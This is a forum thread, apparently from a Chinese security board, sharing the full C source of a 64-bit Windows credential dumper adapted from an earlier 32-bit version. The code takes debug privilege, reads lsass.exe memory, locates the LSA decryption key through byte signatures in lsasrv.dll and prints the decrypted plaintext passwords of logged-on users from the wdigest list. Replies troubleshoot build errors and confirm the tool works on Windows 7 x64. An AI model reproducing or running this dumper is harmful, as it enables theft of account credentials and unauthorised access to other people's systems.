首页
社区
课程
招聘
[分享][分享]64位密码查看 简短代码版
发表于: 2013-4-24 17:55 16718

[分享][分享]64位密码查看 简短代码版

2013-4-24 17:55
16718

分享下 无需注入 根据 Vsbat 的32位代码改的 http://bbs.pediy.com/showthread.php?t=156643 改了几处 32位与64位的 DecryptKeySign 特征码不同 求法也不同 用IDA可定位查看  

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <psapi.h>
//
//  Vsbat[0x710dddd]
//  
//  Note: VC++ 6.0编译/Admin权限执行
//

#define MEM_SIZE 0x1000
#define WIN8     0x0
#define WIN7     0x1
#define WINXP    0x2
#define WIN03    0x4
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ;

typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
{
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;

typedef struct _SECURITY_LOGON_SESSION_DATA {  
    ULONG Size;  
    LUID LogonId;
    LSA_UNICODE_STRING UserName;  
    LSA_UNICODE_STRING LogonDomain;  
    LSA_UNICODE_STRING AuthenticationPackage;  
    ULONG LogonType;  ULONG Session;  
    PSID Sid;  
    LARGE_INTEGER LogonTime;  
    LSA_UNICODE_STRING LogonServer;  
    LSA_UNICODE_STRING DnsDomainName;  
    LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA,  *PSECURITY_LOGON_SESSION_DATA ;

typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ;

typedef struct _LSA_SECPKG_FUNCTION_TABLE {
        long long Func[44];
    long long LsaProtectMemory;
    pDECRIPTFUNC LsaUnprotectMemory;
} LSA_SECPKG_FUNCTION_TABLE, *PLSA_SECPKG_FUNCTION_TABLE;

PLSA_SECPKG_FUNCTION_TABLE  DecryptFunc ;
DWORD offsetWDigestPrimary = 0;
HANDLE    hProcess ;
char      *Data = NULL;
LPVOID    OripdataAddr;
SIZE_T    g_Size;

int    EnableDebugPrivilege() ;
void   printHexBytes(PBYTE data, int nBytes) ;
PBYTE  search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
HANDLE GetProcessHandleByName(const CHAR *szName) ;
LPVOID GetEncryptListHead() ;
void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ;

BYTE DecryptKeySign_WIN7[]  = { 0xF6, 0xC2, 0x07, 0x0F, 0x85, 0x0D, 0x1A, 0x02, 0x00 } ;
BYTE DecryptKeySign_WIN8_7601[]  = { 0xF6, 0xC2, 0x07, 0x0F, 0x85, 0x72, 0xEA, 0x01, 0x00 } ;

BYTE DecryptKeySign_XP[]    = { 0x4C, 0x8B, 0xCB, 0x48, 0x89, 0x44, 0x24, 0x30} ;

BYTE KeyPointerSign[]  = { 0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d } ;

BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
BYTE Encryptdata[0x100] ;

HANDLE GetProcessList()
{
        BOOL bRet;
        HANDLE hProcess = NULL;
        PROCESSENTRY32 pInfo;
        pInfo.dwSize = sizeof(PROCESSENTRY32);

        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if(hSnapshot == INVALID_HANDLE_VALUE)
        {
                printf("ProcessList Error...\n");
                return hProcess;
        }

        for(bRet = Process32First(hSnapshot, &pInfo); bRet; bRet = Process32Next(hSnapshot, &pInfo))
        {
          if(lstrcmpi(pInfo.szExeFile, "lsass.exe") == 0)
                  {
                          hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, pInfo.th32ProcessID);
                          break;
                  }
        }
        return hProcess;
}

LPVOID GetEncryptListHead()
{
    HINSTANCE hMod ;
    LPVOID    pEndAddr, pTemp ;
    PBYTE *KeyPointer;
    hMod = LoadLibrary("wdigest.dll") ;
    pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ;
    pTemp = hMod ;
    KeyPointer = NULL ;
    if(pTemp < pEndAddr && pTemp != NULL)
    {
                KeyPointer = (PBYTE *)&pTemp ;
        pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
                KeyPointerSign, sizeof(KeyPointerSign)) ;
       
        }
        *KeyPointer += -4;

        *KeyPointer += sizeof(long) + *reinterpret_cast<long *>(*KeyPointer);

    FreeLibrary(hMod) ;
    return *KeyPointer ;
}

LPVOID searchLSAFuncs()
{

        HMODULE hLsasrv;
        if(hLsasrv = LoadLibraryW(L"lsasrv"))
        {
                MODULEINFO mesInfos;
                if(GetModuleInformation(GetCurrentProcess(), hLsasrv, &mesInfos, sizeof(MODULEINFO)))
                {
                        struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")};
                        if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification)
                                return search_bytes((PBYTE)hLsasrv, (PBYTE)(hLsasrv + mesInfos.SizeOfImage), reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable));
                }
        }
        return NULL;

}

void getPtrFromLinkedListByLuid(PLIST_ENTRY pSecurityStruct, unsigned long LUIDoffset, PLUID luidToFind)
{
        SIZE_T dwBytesRead;
        PLIST_ENTRY resultat = NULL;
        char EncryptBuf[0x100] = {0};
        ReadProcessMemory(hProcess,  pSecurityStruct, EncryptBuf, 0x100, &dwBytesRead) ;
        while(((PLIST_ENTRY)EncryptBuf)->Flink != pSecurityStruct)
        {
                ReadProcessMemory(hProcess, ((PLIST_ENTRY)EncryptBuf)->Flink, EncryptBuf, 0x100, &dwBytesRead) ;
        if(RtlEqualLuid(luidToFind, reinterpret_cast<PLUID>(reinterpret_cast<PBYTE>(EncryptBuf) + LUIDoffset)))
                {
                        break;
                }
        }
        if(((PLIST_ENTRY)EncryptBuf)->Flink == pSecurityStruct)
        {
                puts("Specific LUID NOT found\n") ;
                return ;
        }
        PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
        mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(EncryptBuf) + offsetWDigestPrimary);
        if(mesCreds)
        {
                BYTE Password[100] = {0};
                ReadProcessMemory(hProcess, mesCreds->Password.Buffer, Password, mesCreds->Password.MaximumLength, &dwBytesRead);
                DecryptFunc->LsaUnprotectMemory(Password, mesCreds->Password.MaximumLength);
                printf("PassWord: %S\n\n", Password);
        }
}
int main()
{
    HINSTANCE hModlsasrv ;
    DWORD     LogonSessionCount, i ;
    PLUID     LogonSessionList, pCurLUID ;
   
    if(EnableDebugPrivilege() != 1)
        puts("EnableDebugPrivilege fail !") ;

    hProcess = GetProcessList() ;
    if(hProcess == NULL)
    {
        puts("GetProcessHandleByName fail !") ;
        puts("Try To Run As Administrator ...") ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        return 0 ;
    }

    OSVERSIONINFO VersionInformation ;
    DWORD osKind = -1 ;

    memset(&VersionInformation, 0, sizeof(VersionInformation));
    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ;
    GetVersionEx(&VersionInformation) ;
    if (VersionInformation.dwMajorVersion == 5)
    {
      if ( VersionInformation.dwMinorVersion == 1 )
      {
            osKind = WINXP ;
      }
      else if (VersionInformation.dwMinorVersion == 2)
      {
            osKind = WIN03 ;
      }
    }
    else if (VersionInformation.dwMajorVersion == 6)
        {
                if(VersionInformation.dwBuildNumber == 7601)
                        osKind = WIN8;
                else
                        osKind = WIN7 ;
        }

    if(osKind == -1)
    {
        printf("[Undefined OS version]  Major: %d Minor: %d\n", \
              VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        CloseHandle(hProcess) ;
        return 0 ;
    }
    offsetWDigestPrimary = ((VersionInformation.dwMajorVersion < 6) ? ((VersionInformation.dwMinorVersion < 2) ? 36 : 48) : 48);

    hModlsasrv  = LoadLibrary("lsasrv.dll");
    DecryptFunc = (PLSA_SECPKG_FUNCTION_TABLE)((long long)searchLSAFuncs() - 136);

        printf("DecryptFunc: 0x%016x\n", DecryptFunc);
    LPVOID  ListHead ;
    ListHead = GetEncryptListHead() ;                 
    printf("ListHead:    0x%016x\n", ListHead);

    CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ;  

    HINSTANCE                   hModSecur32 ;
    pLSAENUMERATELOGONSESSIONS  LsaEnumerateLogonSessions ;
    pLSAGETLOGONSESSIONDATA     LsaGetLogonSessionData ;
    pLSAFREERETURNBUFFER        LsaFreeReturnBuffer ;

    hModSecur32               = LoadLibrary("Secur32.dll") ;
    LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ;
    LsaGetLogonSessionData    = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ;
    LsaFreeReturnBuffer       = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ;

    LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ;
    for(i = 0 ; i < LogonSessionCount ; i++)
    {
        pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ;
        printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ;
        getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(ListHead), 32, pCurLUID);
    }

    CloseHandle(hProcess) ;
    LsaFreeReturnBuffer(LogonSessionList) ;

    FreeLibrary(hModlsasrv) ;
    FreeLibrary(hModSecur32) ;
    if(osKind == WIN7)
    {
        FreeLibrary(GetModuleHandle("bcrypt.dll")) ;
        FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ;
    }
        memcpy(OripdataAddr, Data, g_Size);
    return 0 ;
}

void printSessionInfo(pLSAGETLOGONSESSIONDATA  LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
    PSECURITY_LOGON_SESSION_DATA pLogonSessionData ;

    LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ;
    printf("UserName: %S\n", pLogonSessionData->UserName.Buffer) ;
    printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer) ;

    LsaFreeReturnBuffer(pLogonSessionData) ;
}

int EnableDebugPrivilege()
{
    HANDLE hToken ;
    LUID   sedebugnameValue ;
    TOKEN_PRIVILEGES tkp ;

    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) )
    {
        puts("OpenProcessToken fail") ;
        return 0 ;
    }
    if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        puts("LookupPrivilegeValue fail") ;
        return 0 ;
    }

    tkp.PrivilegeCount = 1 ;
    tkp.Privileges[0].Luid = sedebugnameValue ;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED ;
    if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) )
    {
        puts("AdjustTokenPrivileges fail") ;
        return 0 ;
    }
    return 1 ;
}

PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
    DWORD count = 0 ;
    PBYTE pDst = NULL;

    while((long long)pBegin + (long long)nsize <= (long long)pEnd)
    {
        pDst  = pBytes ;
        count = 0 ;
        while(count < nsize && *pBegin == *pDst)
        {
            pBegin ++ ;
            pDst   ++ ;
            count  ++ ;
        }
        if(count == nsize)  break ;
        pBegin = pBegin - count + 1 ;
    }
    if(count == nsize)
    {
        return (PBYTE)((long long)pBegin - (long long)count) ;
    }
    else
    {
        return NULL ;
    }
}

void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
    PIMAGE_SECTION_HEADER pSectionHead ;
    PIMAGE_DOS_HEADER     pDosHead ;
    PIMAGE_NT_HEADERS     pPEHead  ;
    SIZE_T                dwBytes, dwBytesRead ;
    LPVOID                pdataAddr, pDecryptKey , DecryptKey, pEndAddr ,pDecryptKey1;

    pDosHead     = (PIMAGE_DOS_HEADER)hModlsasrv ;

        if(osKind < 2)
        {
                pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (long long)hModlsasrv \
                   + sizeof(IMAGE_NT_HEADERS) + 2 * sizeof(IMAGE_SECTION_HEADER)) ;
        }
        else
        {
                pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (long long)hModlsasrv \
                   + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ;
        }
       

    pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress  + (long long)hModlsasrv) ;
        OripdataAddr = pdataAddr;
    g_Size = dwBytes   = (DWORD)(pSectionHead->Misc.VirtualSize);

        Data = (char *)malloc(dwBytes);
        memset(Data, 0, dwBytes);
        memcpy(Data, pdataAddr, dwBytes);

    ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ;

    pPEHead   = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (long long)hModlsasrv) ;
    pEndAddr  = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (long long)hModlsasrv) ;

    switch(osKind)
    {
    case WINXP :
    case WIN03 :
        {
            pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
                            DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ;

            pDecryptKey =  (LPVOID)((long long)pDecryptKey + sizeof(DecryptKeySign_XP));
            pDecryptKey1 = (LPVOID)(*(long *)((long long)pDecryptKey + 3));
            pDecryptKey = (LPVOID)((long long)pDecryptKey1 + 7 +  (long long)pDecryptKey);

            ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 8, &dwBytesRead) ;

            ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)pDecryptKey ;
            *(long long *)pdataAddr = (long long)MemBuf ;

            break ;
        }
        case WIN8 :
    case WIN7 :
                {

                        LoadLibrary("bcrypt.dll") ;
                        LoadLibrary("bcryptprimitives.dll") ;

                        if(osKind == WIN7)
                        {
                                pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
                                        DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ;
                        }
                        else
                        {
                                pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
                                        DecryptKeySign_WIN8_7601, sizeof(DecryptKeySign_WIN8_7601)) ;
                        }

                        pDecryptKey =  (LPVOID)((long long)pDecryptKey + sizeof(DecryptKeySign_WIN7));
            pDecryptKey1 = (LPVOID)(*(long *)((long long)pDecryptKey + 3));
            pDecryptKey = (LPVOID)((long long)pDecryptKey1 + 7 +  (long long)pDecryptKey);

            ReadProcessMemory(hProcess,  pDecryptKey, &DecryptKey, 0x8, &dwBytesRead) ;
            
            ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)pDecryptKey ;
            *(long long *)pdataAddr = (long long)MemBuf ;
   
                        pDecryptKey1 = (LPVOID)(*(long *)((long long)MemBuf + 8));
            ReadProcessMemory(hProcess, pDecryptKey1, SecBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)((long long)MemBuf + 8) ;
            *(long long *)pdataAddr = (long long)SecBuf ;

                        pDecryptKey1 = (LPVOID)(*(long *)((long long)MemBuf + 16));
            ReadProcessMemory(hProcess, pDecryptKey1, ThirdBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)((long long)MemBuf + 16) ;
            *(long long *)pdataAddr = (long long)ThirdBuf ;      

            break ;
        }
    }
    return ;
}


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 6
支持
分享
最新回复 (18)
雪    币: 74
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
LZ,在win764位系统下编译报下面错误是什么原因呢?
上传的附件:
2013-4-24 19:24
0
雪    币: 74
活跃值: (87)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
3
在项目属性里面设置下字符集 使用多字节字符集
2013-4-24 19:55
0
雪    币: 94
活跃值: (465)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
32位XP下运行出错
上传的附件:
2013-4-25 08:03
0
雪    币: 3149
活跃值: (66)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
学习了,谢谢分享!
2013-4-25 08:15
0
雪    币: 74
活跃值: (87)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
6
只支持64位,我也没XP64位的环境就做了07 和 03 的,重点在CopyKeyGlobalData函数里对进程的.data段的处理,和通过特征码找lsasrv内存里的hkey地址,特征码就是DecryptKeySign可用IDA提取出来,XP的话找到DecryptKeySign调试下就能兼容了
2013-4-25 09:50
0
雪    币: 74
活跃值: (87)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
7
Vsbat 的32位代码 http://bbs.pediy.com/showthread.php?t=156643
2013-4-25 09:53
0
雪    币: 510
活跃值: (433)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
8
64位win7下运行出错
2013-4-25 12:01
0
雪    币: 74
活跃值: (87)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
9
我是英文系统 有时间再改改 把版本弄齐
2013-4-25 13:17
0
雪    币: 94
活跃值: (465)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
我是指32位下的XP出错。希望楼主能把它完善好,既能在32位下也能再64位下支持。可以先做一个判断,看是64位还是32位系统
2013-4-25 16:28
0
雪    币: 29
活跃值: (131)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
下载测试了一下,运行出错!我的测试机子是WIN7 X64
2013-4-26 00:29
0
雪    币: 74
活跃值: (87)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
12
重新贴了代码 win7 x64 7600版本的该正常吧!不行可以给我lsasrv.dll做兼容
2013-4-26 17:24
0
雪    币: 94
活跃值: (465)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
感谢您的辛勤劳动,希望以后还能支持WIN8,呵呵
2013-4-26 21:15
0
雪    币: 796
活跃值: (370)
能力值: ( LV9,RANK:380 )
在线值:
发帖
回帖
粉丝
14
64位 密码 获取  

mark~~
2013-4-26 21:27
0
雪    币: 12
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
mark一下,大牛们都好强,膜拜之
2013-4-27 19:09
0
雪    币: 206
活跃值: (85)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
先测试一下,应该是行的.
2013-4-28 15:16
0
雪    币: 778
活跃值: (208)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
17
我64位测试可行
2013-5-25 16:44
0
雪    币: 32
活跃值: (319)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
win7 x64 可用
2013-5-26 08:56
0
雪    币: 34
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
谢谢楼主分享,一行一行代码看下来好痛苦,楼主以后在代码里加些注释呗
2013-6-3 10:13
0
游客
登录 | 注册 方可回帖
返回
//